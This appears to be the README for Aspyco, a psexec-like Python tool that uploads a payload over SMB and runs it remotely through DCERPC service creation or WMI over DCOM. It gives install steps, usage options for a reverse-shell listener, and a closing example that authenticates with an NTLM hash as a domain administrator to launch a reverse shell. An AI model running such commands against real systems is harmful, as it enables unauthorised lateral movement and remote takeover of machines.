Aspyco is a python script that permits to upload a local binary through SMB on a remote host.
Then it remotely connects to a named pipe through DCERPC or via DCOM to create and execute your payload.
It's a psexec-like with custom execution !!
On Windows, RPC protocol permits to call remote functions.
Remotely, you can connect on SMB named pipe to call functions with DCERPC protocol.
In that way, you can upload a binary file through SMB and then call some functions
to create a service to execute your payload.
You can also remotely execute binaries with WMI through a DCOM connection.
From sources :
git clone https://github.com/ProcessusT/Aspyco
cd Aspyco
python3 aspyco.py -hAspyco uses Impacket syntax :
usage: aspyco.py [-h] [-payload PAYLOAD] [-listener_ip LISTENER_IP] [-listener_port LISTENER_PORT] [-method METHOD] [-hashes LMHASH:NTHASH] target
Upload and start your custom payloads remotely !
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
options:
-h, --help show this help message and exit
-payload PAYLOAD Your custom binary file
-listener_ip LISTENER_IP Listener ip address if no custom payload is specified
-listener_port LISTENER_PORT Listener port if no custom payload is specified
-method METHOD {"DCERPC-SVCCTL", "DCERPC-ATSVC", "DCOM"} - Default : DCERPC-SVCCTL
-hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASHaspyco -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 custom_reverse_shell.exe